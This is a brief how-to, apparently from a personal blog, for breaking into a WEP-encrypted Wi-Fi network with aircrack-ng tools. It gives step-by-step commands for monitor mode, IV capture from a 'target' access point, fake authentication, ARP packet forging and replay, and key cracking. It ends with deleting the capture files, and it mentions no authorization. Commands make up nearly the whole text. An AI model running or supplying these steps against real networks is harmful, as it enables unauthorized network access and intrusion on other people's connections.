Run the following in the first terminal window to create an interface in monitor mode called mon0 of interface wlan0
The second command shows WEP encrypted networks nearby
The third command starts capturing traffic from your target
airmon-ng start wlan0 #create interface mon0 in monitor mode of wlan0
airodump-ng --encrypt WEP mon0 #shows APs with WEP only
airodump-ng -c [channel] --bssid [mac_of_ap] --ivs -w [filename] mon0
Now open a second terminal and run the following
The first line associates your card with the AP's MAC address (see terminal window 1)
The second line looks for an IV that you can replay.
The third line creates a packet that you replay in the fourth line
aireplay-ng -1 0 -a [mac_of_ap] -h [mac_of_wificard] wlan0
aireplay-ng -5 -b [mac_of_ap] -h [mac_of_wificard] wlan0 #answer Y to prompt
packetforge-ng -0 -a [mac_of_ap] -h [mac_of_wificard] -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet wlan0
aireplay-ng -2 -r arp-packet wlan0 #answer Y to prompt
Watch those packets fly up in terminal window 1!
Open a new terminal window and run the following to start cracking
aircrack-ng -n 128 -b [mac_of_ap] *.ivs
Remember to clean up your crap once you have finished
rm *.ivs *.cap *.xor
And to simplify this I've made a bash script, see the apps page.